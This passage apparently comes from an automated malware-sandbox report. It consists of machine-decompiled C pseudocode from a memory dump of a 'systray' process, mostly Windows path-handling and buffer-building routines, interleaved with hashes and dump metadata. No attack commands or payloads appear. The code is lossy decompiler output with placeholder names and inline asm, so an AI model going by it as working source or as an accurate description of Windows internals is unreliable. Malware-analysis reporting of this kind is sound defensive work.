                                            													if( *(_t528 + 0x14) == 0) {
                                            														__eflags =  *[fs:0x18] + 0xf50;
                                            													}
                                            													asm("movsd");
                                            													asm("movsd");
                                            													asm("movsd");
                                            													asm("movsd");
                                            													__eflags =  *(_t528 + 0x18);
                                            													if( *(_t528 + 0x18) == 0) {
                                            														_t454 =  *(_t528 - 0x80);
                                            														_t479 =  *(_t528 - 0x78);
                                            														_t327 = 1;
                                            														__eflags = 1;
                                            													} else {
                                            														_t146 = _t427 + 0x50; // 0x50
                                            														_t454 = _t146;
                                            														 *(_t528 - 0x80) = _t454;
                                            														_t382 = 0x18;
                                            														 *_t454 = _t382;
                                            														 *((short*)(_t454 + 2)) = 1;
                                            														_t385 = 0x10;
                                            														 *((short*)(_t454 + 6)) = _t385;
                                            														 *(_t454 + 4) = 0;
                                            														asm("movsd");
                                            														asm("movsd");
                                            														asm("movsd");
                                            														asm("movsd");
                                            														_t327 = 1;
                                            														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                            														_t479 = 0x68;
                                            														 *(_t528 - 0x78) = _t479;
                                            													}
                                            													__eflags =  *(_t528 - 0x79) - _t327;
                                            													if( *(_t528 - 0x79) == _t327) {
                                            														_t524 = _t479 + _t427;
                                            														_t508 =  *(_t528 - 0x8c);
                                            														 *_t524 = _t508;
                                            														_t373 = 2;
                                            														 *((short*)(_t524 + 2)) = _t373;
                                            														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
                                            														 *((short*)(_t524 + 4)) = 0;
                                            														_t167 = _t524 + 8; // 0x8
                                            														E045DF3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
                                            														_t529 = _t529 + 0xc;
                                            														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                            														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
                                            														 *(_t528 - 0x78) = _t479;
                                            														_t380 =  *(_t528 - 0x80);
                                            														__eflags = _t380;
                                            														if(_t380 != 0) {
                                            															_t173 = _t380 + 4;
                                            															 *_t173 =  *(_t380 + 4) | 1;
                                            															__eflags =  *_t173;
                                            														}
                                            														_t454 = _t524;
                                            														 *(_t528 - 0x80) = _t454;
                                            														_t327 = 1;
                                            														__eflags = 1;
                                            													}
                                            													__eflags =  *(_t528 - 0xd4);
                                            													if( *(_t528 - 0xd4) == 0) {
                                            														_t505 =  *(_t528 - 0x80);
                                            													} else {
                                            														_t505 = _t479 + _t427;
                                            														_t523 = 0x10;
                                            														 *_t505 = _t523;
                                            														_t367 = 3;
                                            														 *((short*)(_t505 + 2)) = _t367;
                                            														_t368 = 4;
                                            														 *((short*)(_t505 + 6)) = _t368;
                                            														 *(_t505 + 4) = 0;
                                            														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
                                            														_t327 = 1;
                                            														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                            														_t479 = _t479 + _t523;
                                            														 *(_t528 - 0x78) = _t479;
                                            														__eflags = _t454;
                                            														if(_t454 != 0) {
                                            															_t186 = _t454 + 4;
                                            															 *_t186 =  *(_t454 + 4) | 1;
                                            															__eflags =  *_t186;
                                            														}
                                            														 *(_t528 - 0x80) = _t505;
                                            													}
                                            													__eflags =  *(_t528 - 0x7a) - _t327;
                                            													if( *(_t528 - 0x7a) == _t327) {
                                            														 *(_t528 - 0xd4) = _t479 + _t427;
                                            														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
                                            														E045DF3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
                                            														_t529 = _t529 + 0xc;
                                            														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                            														_t479 =  *(_t528 - 0x78) + _t522;
                                            														 *(_t528 - 0x78) = _t479;
                                            														__eflags = _t505;
                                            														if(_t505 != 0) {
                                            															_t199 = _t505 + 4;
                                            															 *_t199 =  *(_t505 + 4) | 1;
                                            															__eflags =  *_t199;
                                            														}
                                            														_t505 =  *(_t528 - 0xd4);
                                            														 *(_t528 - 0x80) = _t505;
                                            													}
                                            													__eflags =  *(_t528 - 0xa8);
                                            													if( *(_t528 - 0xa8) != 0) {
                                            														_t356 = _t479 + _t427;
                                            														 *(_t528 - 0xd4) = _t356;
                                            														_t462 =  *(_t528 - 0xac);
                                            														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
                                            														_t485 = 0xc;
                                            														 *((short*)(_t356 + 2)) = _t485;
                                            														 *(_t356 + 6) = _t462;
                                            														 *((short*)(_t356 + 4)) = 0;
                                            														_t211 = _t356 + 8; // 0x9
                                            														E045DF3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
                                            														E045DFA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
                                            														_t529 = _t529 + 0x18;
                                            														_t427 =  *(_t528 - 0x88);
                                            														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                            														_t505 =  *(_t528 - 0xd4);
                                            														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
                                            														 *(_t528 - 0x78) = _t479;
                                            														_t362 =  *(_t528 - 0x80);
                                            														__eflags = _t362;
                                            														if(_t362 != 0) {
                                            															_t222 = _t362 + 4;
                                            															 *_t222 =  *(_t362 + 4) | 1;
                                            															__eflags =  *_t222;
                                            														}
                                            													}
                                            													__eflags =  *(_t528 - 0xb0);
                                            													if( *(_t528 - 0xb0) != 0) {
                                            														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
                                            														_t458 = 0xb;
                                            														 *((short*)(_t479 + _t427 + 2)) = _t458;
                                            														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
                                            														 *((short*)(_t427 + 4 + _t479)) = 0;
                                            														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
                                            														E045DFA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
                                            														_t529 = _t529 + 0xc;
                                            														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                            														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
                                            														 *(_t528 - 0x78) = _t479;
                                            														__eflags = _t505;
                                            														if(_t505 != 0) {
                                            															_t241 = _t505 + 4;
                                            															 *_t241 =  *(_t505 + 4) | 1;
                                            															__eflags =  *_t241;
                                            														}
                                            													}
                                            													_t328 =  *(_t528 + 0x1c);
                                            													__eflags = _t328;
                                            													if(_t328 == 0) {
                                            														L87:
                                            														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
                                            														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
                                            														_t455 =  *(_t528 - 0xdc);
                                            														 *(_t427 + 0x14) = _t455;
                                            														_t480 =  *(_t528 - 0xa0);
                                            														_t517 = 3;
                                            														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
                                            														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
                                            															asm("rdtsc");
                                            															 *(_t427 + 0x3c) = _t480;
                                            														} else {
                                            															 *(_t427 + 0x3c) = _t455;
                                            														}
                                            														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
                                            														_t456 =  *[fs:0x18];
                                            														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
                                            														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
                                            														_t427 = 0;
                                            														__eflags = 0;
                                            														_t511 = 0x18;
                                            														goto L91;
                                            													} else {
                                            														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
                                            														__eflags = _t519;
                                            														 *(_t528 - 0x8c) = _t328;
                                            														do {
                                            															_t506 =  *((intOrPtr*)(_t519 - 4));
                                            															_t457 =  *((intOrPtr*)(_t519 - 0xc));
                                            															 *(_t528 - 0xd4) =  *(_t519 - 8);
                                            															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
                                            															__eflags =  *(_t333 + 0x36) & 0x00004000;
                                            															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
                                            																_t334 =  *_t519;
                                            															} else {
                                            																_t334 = 0;
                                            															}
                                            															_t336 = _t334 & 0x000000ff;
                                            															__eflags = _t336;
                                            															_t427 =  *(_t528 - 0x88);
                                            															if(_t336 == 0) {
                                            																_t481 = _t479 + _t506;
                                            																__eflags = _t481;
                                            																 *(_t528 - 0x78) = _t481;
                                            																E045DF3E0(_t479 + _t427, _t457, _t506);
                                            																_t529 = _t529 + 0xc;
                                            															} else {
                                            																_t340 = _t336 - 1;
                                            																__eflags = _t340;
                                            																if(_t340 == 0) {
                                            																	E045DF3E0( *(_t528 - 0xb8), _t457, _t506);
                                            																	_t529 = _t529 + 0xc;
                                            																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
                                            																} else {
                                            																	__eflags = _t340 == 0;
                                            																	if(_t340 == 0) {
                                            																		__eflags = _t506 - 8;
                                            																		if(_t506 == 8) {
                                            																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
                                            																			 *(_t528 - 0xdc) =  *(_t457 + 4);
                                            																		}
                                            																	}
                                            																}
                                            															}
                                            															_t339 = 0x10;
                                            															_t519 = _t519 + _t339;
                                            															_t263 = _t528 - 0x8c;
                                            															 *_t263 =  *(_t528 - 0x8c) - 1;
                                            															__eflags =  *_t263;
                                            															_t479 =  *(_t528 - 0x78);
                                            														} while ( *_t263 != 0);
                                            														goto L87;
                                            													}
                                            												}
                                            											} else {
                                            												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
                                            												 *(_t528 - 0xa2) = _t392;
                                            												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
                                            												__eflags = _t469;
                                            												while(1) {
                                            													 *(_t528 - 0xe4) = _t511;
                                            													__eflags = _t392;
                                            													_t393 = _t427;
                                            													if(_t392 != 0) {
                                            														_t393 =  *((intOrPtr*)(_t469 + 4));
                                            													}
                                            													_t395 = (_t393 & 0x000000ff) - _t427;
                                            													__eflags = _t395;
                                            													if(_t395 == 0) {
                                            														_t511 = _t511 +  *_t469;
                                            														__eflags = _t511;
                                            													} else {
                                            														_t398 = _t395 - 1;
                                            														__eflags = _t398;
                                            														if(_t398 == 0) {
                                            															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
                                            															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
                                            														} else {
                                            															__eflags = _t398 == 1;
                                            															if(_t398 == 1) {
                                            																 *(_t528 - 0xa8) =  *(_t469 - 8);
                                            																_t402 =  *_t469 & 0x0000ffff;
                                            																 *(_t528 - 0xac) = _t402;
                                            																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                                            															}
                                            														}
                                            													}
                                            													__eflags = _t511 -  *(_t528 - 0xe4);
                                            													if(_t511 <  *(_t528 - 0xe4)) {
                                            														break;
                                            													}
                                            													_t397 =  *(_t528 - 0x88) + 1;
                                            													 *(_t528 - 0x88) = _t397;
                                            													_t469 = _t469 + 0x10;
                                            													__eflags = _t397 -  *(_t528 + 0x1c);
                                            													_t392 =  *(_t528 - 0xa2);
                                            													if(_t397 <  *(_t528 + 0x1c)) {
                                            														continue;
                                            													}
                                            													goto L45;
                                            												}
                                            												_t475 = 0x216;
                                            												 *(_t528 - 0x74) = 0x216;
                                            												goto L45;
                                            											}
                                            										} else {
                                            											asm("lock dec dword [eax+ecx*8+0x4]");
                                            											goto L16;
                                            										}
                                            									}
                                            									_t491 = E04664CAB(_t306, _t528 - 0xa4);
                                            									 *(_t528 - 0x74) = _t491;
                                            									__eflags = _t491;
                                            									if(_t491 != 0) {
                                            										goto L91;
                                            									} else {
                                            										_t474 =  *((intOrPtr*)(_t528 - 0x94));
                                            										goto L20;
                                            									}
                                            								}
                                            								L16:
                                            								 *(_t528 - 0x74) = 0x1069;
                                            								L93:
                                            								_t298 =  *(_t528 - 0xd0) + 1;
                                            								 *(_t528 - 0xd0) = _t298;
                                            								_t474 = _t474 + _t511;
                                            								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                                            								_t494 = 4;
                                            								__eflags = _t298 - _t494;
                                            								if(_t298 >= _t494) {
                                            									goto L100;
                                            								}
                                            								_t494 =  *(_t528 - 0xcc);
                                            								_t435 = _t298;
                                            								continue;
                                            							}
                                            							__eflags = _t494[2] | _t494[3];
                                            							if((_t494[2] | _t494[3]) == 0) {
                                            								goto L15;
                                            							}
                                            							goto L12;
                                            						}
                                            						__eflags = _t301;
                                            						if(_t301 != 0) {
                                            							goto L92;
                                            						}
                                            						goto L10;
                                            						L92:
                                            						goto L93;
                                            					}
                                            				} else {
                                            					_push(0x57);
                                            					L101:
                                            					return E045ED130(_t427, _t494, _t511);
                                            				}
                                            			}
                                            0x00000000
                                            0x00000000
                                            0x0466637f
                                            0x04666385
                                            0x00000000
                                            0x04666385
                                            0x04665d38
                                            0x04665d3b
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x04665d3b
                                            0x04665d27
                                            0x04665d29
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x04666360
                                            0x00000000
                                            0x04666360
                                            0x04665c10
                                            0x04665c10
                                            0x046663da
                                            0x046663e5
                                            0x046663e5

                                            Memory Dump Source
                                            • Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true
                                            • Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp
                                            • Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_4570000_systray.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2a7bbb33baa464af85e3257c0bb3ba26da0ee53d8c3c0ede4878722b63276eb1
                                            • Instruction ID: 3cd17efa3f77c2e5d2bac68b2e9b54a64ecf40d8c89d7e524113553ae9fca3de
                                            • Opcode Fuzzy Hash: 2a7bbb33baa464af85e3257c0bb3ba26da0ee53d8c3c0ede4878722b63276eb1
                                            • Instruction Fuzzy Hash: 2A425B71A00229DFDB24CF68D881BA9B7B1FF55304F1481AAD94EEB342E734A985CF50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 92%
                                            			E045B4120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
                                            				signed int _v8;
                                            				void* _v20;
                                            				signed int _v24;
                                            				char _v532;
                                            				char _v540;
                                            				signed short _v544;
                                            				signed int _v548;
                                            				signed short* _v552;
                                            				signed short _v556;
                                            				signed short* _v560;
                                            				signed short* _v564;
                                            				signed short* _v568;
                                            				void* _v570;
                                            				signed short* _v572;
                                            				signed short _v576;
                                            				signed int _v580;
                                            				char _v581;
                                            				void* _v584;
                                            				unsigned int _v588;
                                            				signed short* _v592;
                                            				void* _v597;
                                            				void* _v600;
                                            				void* _v604;
                                            				void* _v609;
                                            				void* _v616;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				unsigned int _t161;
                                            				signed int _t162;
                                            				unsigned int _t163;
                                            				void* _t169;
                                            				signed short _t173;
                                            				signed short _t177;
                                            				signed short _t181;
                                            				unsigned int _t182;
                                            				signed int _t185;
                                            				signed int _t213;
                                            				signed int _t225;
                                            				short _t233;
                                            				signed char _t234;
                                            				signed int _t242;
                                            				signed int _t243;
                                            				signed int _t244;
                                            				signed int _t245;
                                            				signed int _t250;
                                            				void* _t251;
                                            				signed short* _t254;
                                            				void* _t255;
                                            				signed int _t256;
                                            				void* _t257;
                                            				signed short* _t260;
                                            				signed short _t265;
                                            				signed short* _t269;
                                            				signed short _t271;
                                            				signed short** _t272;
                                            				signed short* _t275;
                                            				signed short _t282;
                                            				signed short _t283;
                                            				signed short _t290;
                                            				signed short _t299;
                                            				signed short _t307;
                                            				signed int _t308;
                                            				signed short _t311;
                                            				signed short* _t315;
                                            				signed short _t316;
                                            				void* _t317;
                                            				void* _t319;
                                            				signed short* _t321;
                                            				void* _t322;
                                            				void* _t323;
                                            				unsigned int _t324;
                                            				signed int _t325;
                                            				void* _t326;
                                            				signed int _t327;
                                            				signed int _t329;
                                            
                                            				_t329 = (_t327 & 0xfffffff8) - 0x24c;
                                            				_v8 =  *0x468d360 ^ _t329;
                                            				_t157 = _a8;
                                            				_t321 = _a4;
                                            				_t315 = __edx;
                                            				_v548 = __ecx;
                                            				_t305 = _a20;
                                            				_v560 = _a12;
                                            				_t260 = _a16;
                                            				_v564 = __edx;
                                            				_v580 = _a8;
                                            				_v572 = _t260;
                                            				_v544 = _a20;
                                            				if( *__edx <= 8) {
                                            					L3:
                                            					if(_t260 != 0) {
                                            						 *_t260 = 0;
                                            					}
                                            					_t254 =  &_v532;
                                            					_v588 = 0x208;
                                            					if((_v548 & 0x00000001) != 0) {
                                            						_v556 =  *_t315;
                                            						_v552 = _t315[2];
                                            						_t161 = E045CF232( &_v556);
                                            						_t316 = _v556;
                                            						_v540 = _t161;
                                            						goto L17;
                                            					} else {
                                            						_t306 = 0x208;
                                            						_t298 = _t315;
                                            						_t316 = E045B6E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
                                            						if(_t316 == 0) {
                                            							L68:
                                            							_t322 = 0xc0000033;
                                            							goto L39;
                                            						} else {
                                            							while(_v581 == 0) {
                                            								_t233 = _v588;
                                            								if(_t316 > _t233) {
                                            									_t234 = _v548;
                                            									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
                                            										_t254 = L045B4620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
                                            										if(_t254 == 0) {
                                            											_t169 = 0xc0000017;
                                            										} else {
                                            											_t298 = _v564;
                                            											_v588 = _t316;
                                            											_t306 = _t316;
                                            											_t316 = E045B6E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
                                            											if(_t316 != 0) {
                                            												continue;
                                            											} else {
                                            												goto L68;
                                            											}
                                            										}
                                            									} else {
                                            										goto L90;
                                            									}
                                            								} else {
                                            									_v556 = _t316;
                                            									 *((short*)(_t329 + 0x32)) = _t233;
                                            									_v552 = _t254;
                                            									if(_t316 < 2) {
                                            										L11:
                                            										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
                                            											_t161 = 5;
                                            										} else {
                                            											if(_t316 < 6) {
                                            												L87:
                                            												_t161 = 3;
                                            											} else {
                                            												_t242 = _t254[2] & 0x0000ffff;
                                            												if(_t242 != 0x5c) {
                                            													if(_t242 == 0x2f) {
                                            														goto L16;
                                            													} else {
                                            														goto L87;
                                            													}
                                            													goto L101;
                                            												} else {
                                            													L16:
                                            													_t161 = 2;
                                            												}
                                            											}
                                            										}
                                            									} else {
                                            										_t243 =  *_t254 & 0x0000ffff;
                                            										if(_t243 == 0x5c || _t243 == 0x2f) {
                                            											if(_t316 < 4) {
                                            												L81:
                                            												_t161 = 4;
                                            												goto L17;
                                            											} else {
                                            												_t244 = _t254[1] & 0x0000ffff;
                                            												if(_t244 != 0x5c) {
                                            													if(_t244 == 0x2f) {
                                            														goto L60;
                                            													} else {
                                            														goto L81;
                                            													}
                                            												} else {
                                            													L60:
                                            													if(_t316 < 6) {
                                            														L83:
                                            														_t161 = 1;
                                            														goto L17;
                                            													} else {
                                            														_t245 = _t254[2] & 0x0000ffff;
                                            														if(_t245 != 0x2e) {
                                            															if(_t245 == 0x3f) {
                                            																goto L62;
                                            															} else {
                                            																goto L83;
                                            															}
                                            														} else {
                                            															L62:
                                            															if(_t316 < 8) {
                                            																L85:
                                            																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
                                            																goto L17;
                                            															} else {
                                            																_t250 = _t254[3] & 0x0000ffff;
                                            																if(_t250 != 0x5c) {
                                            																	if(_t250 == 0x2f) {
                                            																		goto L64;
                                            																	} else {
                                            																		goto L85;
                                            																	}
                                            																} else {
                                            																	L64:
                                            																	_t161 = 6;
                                            																	goto L17;
                                            																}
                                            															}
                                            														}
                                            													}
                                            												}
                                            											}
                                            											goto L101;
                                            										} else {
                                            											goto L11;
                                            										}
                                            									}
                                            									L17:
                                            									if(_t161 != 2) {
                                            										_t162 = _t161 - 1;
                                            										if(_t162 > 5) {
                                            											goto L18;
                                            										} else {
                                            											switch( *((intOrPtr*)(_t162 * 4 +  &M045B45F8))) {
                                            												case 0:
                                            													_v568 = 0x4571078;
                                            													__eax = 2;
                                            													goto L20;
                                            												case 1:
                                            													goto L18;
                                            												case 2:
                                            													_t163 = 4;
                                            													goto L19;
                                            											}
                                            										}
                                            										goto L41;
                                            									} else {
                                            										L18:
                                            										_t163 = 0;
                                            										L19:
                                            										_v568 = 0x45711c4;
                                            									}
                                            									L20:
                                            									_v588 = _t163;
                                            									_v564 = _t163 + _t163;
                                            									_t306 =  *_v568 & 0x0000ffff;
                                            									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
                                            									_v576 = _t265;
                                            									if(_t265 > 0xfffe) {
                                            										L90:
                                            										_t322 = 0xc0000106;
                                            									} else {
                                            										if(_t321 != 0) {
                                            											if(_t265 > (_t321[1] & 0x0000ffff)) {
                                            												if(_v580 != 0) {
                                            													goto L23;
                                            												} else {
                                            													_t322 = 0xc0000106;
                                            													goto L39;
                                            												}
                                            											} else {
                                            												_t177 = _t306;
                                            												goto L25;
                                            											}
                                            											goto L101;
                                            										} else {
                                            											if(_v580 == _t321) {
                                            												_t322 = 0xc000000d;
                                            											} else {
                                            												L23:
                                            												_t173 = L045B4620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
                                            												_t269 = _v592;
                                            												_t269[2] = _t173;
                                            												if(_t173 == 0) {
                                            													_t322 = 0xc0000017;
                                            												} else {
                                            													_t316 = _v556;
                                            													 *_t269 = 0;
                                            													_t321 = _t269;
                                            													_t269[1] = _v576;
                                            													_t177 =  *_v568 & 0x0000ffff;
                                            													L25:
                                            													_v580 = _t177;
                                            													if(_t177 == 0) {
                                            														L29:
                                            														_t307 =  *_t321 & 0x0000ffff;
                                            													} else {
                                            														_t290 =  *_t321 & 0x0000ffff;
                                            														_v576 = _t290;
                                            														_t310 = _t177 & 0x0000ffff;
                                            														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
                                            															_t307 =  *_t321 & 0xffff;
                                            														} else {
                                            															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
                                            															E045DF720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
                                            															_t329 = _t329 + 0xc;
                                            															_t311 = _v580;
                                            															_t225 =  *_t321 + _t311 & 0x0000ffff;
                                            															 *_t321 = _t225;
                                            															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
                                            																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
                                            															}
                                            															goto L29;
                                            														}
                                            													}
                                            													_t271 = _v556 - _v588 + _v588;
                                            													_v580 = _t307;
                                            													_v576 = _t271;
                                            													if(_t271 != 0) {
                                            														_t308 = _t271 & 0x0000ffff;
                                            														_v588 = _t308;
                                            														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
                                            															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
                                            															E045DF720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
                                            															_t329 = _t329 + 0xc;
                                            															_t213 =  *_t321 + _v576 & 0x0000ffff;
                                            															 *_t321 = _t213;
                                            															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
                                            																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
                                            															}
                                            														}
                                            													}
                                            													_t272 = _v560;
                                            													if(_t272 != 0) {
                                            														 *_t272 = _t321;
                                            													}
                                            													_t306 = 0;
                                            													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
                                            													_t275 = _v572;
                                            													if(_t275 != 0) {
                                            														_t306 =  *_t275;
                                            														if(_t306 != 0) {
                                            															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
                                            														}
                                            													}
                                            													_t181 = _v544;
                                            													if(_t181 != 0) {
                                            														 *_t181 = 0;
                                            														 *((intOrPtr*)(_t181 + 4)) = 0;
                                            														 *((intOrPtr*)(_t181 + 8)) = 0;
                                            														 *((intOrPtr*)(_t181 + 0xc)) = 0;
                                            														if(_v540 == 5) {
                                            															_t182 = E045952A5(1);
                                            															_v588 = _t182;
                                            															if(_t182 == 0) {
                                            																E045AEB70(1, 0x46879a0);
                                            																goto L38;
                                            															} else {
                                            																_v560 = _t182 + 0xc;
                                            																_t185 = E045AAA20( &_v556, _t182 + 0xc,  &_v556, 1);
                                            																if(_t185 == 0) {
                                            																	_t324 = _v588;
                                            																	goto L97;
                                            																} else {
                                            																	_t306 = _v544;
                                            																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
                                            																	 *(_t306 + 4) = _t282;
                                            																	_v576 = _t282;
                                            																	_t325 = _t316 -  *_v560 & 0x0000ffff;
                                            																	 *_t306 = _t325;
                                            																	if( *_t282 == 0x5c) {
                                            																		_t149 = _t325 - 2; // -2
                                            																		_t283 = _t149;
                                            																		 *_t306 = _t283;
                                            																		 *(_t306 + 4) = _v576 + 2;
                                            																		_t185 = _t283 & 0x0000ffff;
                                            																	}
                                            																	_t324 = _v588;
                                            																	 *(_t306 + 2) = _t185;
                                            																	if((_v548 & 0x00000002) == 0) {
                                            																		L97:
                                            																		asm("lock xadd [esi], eax");
                                            																		if((_t185 | 0xffffffff) == 0) {
                                            																			_push( *((intOrPtr*)(_t324 + 4)));
                                            																			E045D95D0();
                                            																			L045B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
                                            																		}
                                            																	} else {
                                            																		 *(_t306 + 0xc) = _t324;
                                            																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
                                            																	}
                                            																	goto L38;
                                            																}
                                            															}
                                            															goto L41;
                                            														}
                                            													}
                                            													L38:
                                            													_t322 = 0;
                                            												}
                                            											}
                                            										}
                                            									}
                                            									L39:
                                            									if(_t254 !=  &_v532) {
                                            										L045B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
                                            									}
                                            									_t169 = _t322;
                                            								}
                                            								goto L41;
                                            							}
                                            							goto L68;
                                            						}
                                            					}
                                            					L41:
                                            					_pop(_t317);
                                            					_pop(_t323);
                                            					_pop(_t255);
                                            					return E045DB640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
                                            				} else {
                                            					_t299 = __edx[2];
                                            					if( *_t299 == 0x5c) {
                                            						_t256 =  *(_t299 + 2) & 0x0000ffff;
                                            						if(_t256 != 0x5c) {
                                            							if(_t256 != 0x3f) {
                                            								goto L2;
                                            							} else {
                                            								goto L50;
                                            							}
                                            						} else {
                                            							L50:
                                            							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
                                            								goto L2;
                                            							} else {
                                            								_t251 = E045D3D43(_t315, _t321, _t157, _v560, _v572, _t305);
                                            								_pop(_t319);
                                            								_pop(_t326);
                                            								_pop(_t257);
                                            								return E045DB640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
                                            							}
                                            						}
                                            					} else {
                                            						L2:
                                            						_t260 = _v572;
                                            						goto L3;
                                            					}
                                            				}
                                            				L101:
                                            			}

                                            Memory Dump Source
                                            • Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true
                                            • Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp
                                            • Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_4570000_systray.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 708ae5b177bdfca38e03daad6504e26d1a63d9c96262291e65e2007aede43e63
                                            • Instruction ID: 00f7e5285d624ffc401153f157073f3a43e1df2d86c8bb52c7b27a9afc2a4ceb
                                            • Opcode Fuzzy Hash: 708ae5b177bdfca38e03daad6504e26d1a63d9c96262291e65e2007aede43e63
                                            • Instruction Fuzzy Hash: E2F16F706082518BC724CF59D881A7AB7E1FF89704F14892EF5C5CB2A1E734E895EB92
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 67%
                                            			E045C513A(intOrPtr __ecx, void* __edx) {
                                            				signed int _v8;
                                            				signed char _v16;
                                            				intOrPtr _v20;
                                            				intOrPtr _v24;
                                            				char _v28;
                                            				signed int _v32;
                                            				signed int _v36;
                                            				signed int _v40;
                                            				intOrPtr _v44;
                                            				intOrPtr _v48;
                                            				char _v63;
                                            				char _v64;
                                            				signed int _v72;
                                            				signed int _v76;
                                            				signed int _v80;
                                            				signed int _v84;
                                            				signed int _v88;
                                            				signed char* _v92;
                                            				signed int _v100;
                                            				signed int _v104;
                                            				char _v105;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				void* _t157;
                                            				signed int _t159;
                                            				signed int _t160;
                                            				unsigned int* _t161;
                                            				intOrPtr _t165;
                                            				signed int _t172;
